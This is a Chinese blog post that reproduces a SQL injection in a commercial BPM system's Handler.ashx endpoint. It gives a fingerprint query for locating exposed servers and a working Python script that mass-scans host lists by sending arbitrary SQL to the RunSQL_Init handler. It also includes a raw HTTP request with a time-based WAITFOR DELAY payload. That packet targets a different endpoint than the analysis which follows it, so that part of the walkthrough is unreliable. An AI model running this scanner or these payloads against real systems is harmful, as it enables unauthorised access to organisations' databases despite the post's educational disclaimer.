【漏洞复现】某骋BPM Handler SQL注入漏洞

Cityミ slaves

已于 2024-08-16 13:01:12 修改

阅读量1.5k

点赞数 55

分类专栏：漏洞复现文章标签：网络

于 2024-08-16 11:54:43 首次发布

本文链接：https://blog.csdn.net/weixin_54799594/article/details/141226708

版权

漏洞复现专栏收录该内容

21 篇文章 0 订阅

订阅专栏

声明：本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动，将与本文档的作者或发布者无关。

一、漏洞描述

某骋BPM系统是一款全面的商业流程管理平台，旨在帮助企业自动化和优化业务流程。它集成了工作流引擎、表单设计和报表分析等关键功能，能够迅速建立标准化的业务流程，提升工作效率和管理透明度。某骋BPM适用于多种行业场景，如采购审批、费用报销、合同管理等，并提供丰富的行业模板以便快速部署。此外，系统还提供可视化的流程建模工具，使业务人员能够轻松参与流程设计和优化。凭借其强大的功能和卓越的用户体验，某骋BPM推动企业实现数字化转型，并提高整体运营管理水平。然而，其接口Handler.ashx存在SQL注入漏洞，攻击者可能通过此漏洞获取数据库敏感信息或执行系统命令。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索：web.body="BP.WF.HttpHandler.WF_Portal"

2.使用poc批量扫描

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re

# 禁用SSL证书验证，忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在CCBPM_Handler_Init_SQLInject漏洞
    :param url: 目标URL
    :return: 如果存在漏洞，返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/WF/Comm/Handler.ashx?DoType=RunSQL_Init")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1"
    }
    data='------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1\r\nContent-Disposition: form-data; name="SQL"\r\n\r\nSELECT HASHBYTES(\'MD5\', \'123456\')\r\n------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--'
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=5, data=data)
        if response.status_code == 200 and '4QrcOUm6Wau+VuBX8g+IPg==' in response.text:
            print(f"\033[31mDiscovered:{url}: CCBPM_Handler_Init_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本：python poc.py -f host.txt

随机寻找的幸运儿

三、漏洞复现

1.构造数据包

1.构造数据包：


POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 61

Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:15'--

2.数据包分析

这是一个HTTP POST请求的数据包，用于向服务器发送数据。以下是对数据包各部分的详细解析：

1. 请求行（Request Line）：
POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
这表示客户端希望向服务器发送一个POST请求，目标URL是`/WF/Comm/Handler.ashx?DoType=RunSQL_Init`，使用的HTTP协议版本是1.1。

2. 请求头（Request Headers）：
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Length: 147
这些头部信息包括：
- `Host`：指定了请求的目标服务器地址。
- `User-Agent`：描述了发起请求的客户端类型和版本。
- `Content-Type`：指定了请求体的内容类型，这里是`multipart/form-data`，并指定了分隔符为`----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1`。
- `Content-Length`：指定了请求体的长度，这里是147字节。

3. 空行（Empty Line）：
数据包中有一个空行，表示请求头和请求体之间的分隔。

4. 请求体（Request Body）：
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Disposition: form-data; name="SQL"

SELECT HASHBYTES('MD5', '123456')
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--
这部分包含了实际要发送给服务器的数据。这里使用了`multipart/form-data`格式，每个部分由边界分隔符开始，然后是`Content-Disposition`头部，指定了表单字段的名称。在这个例子中，只有一个名为`SQL`的字段，其值为`SELECT HASHBYTES('MD5', '123456')`。最后，边界分隔符再次出现，后面跟着两个连字符`--`，表示结束。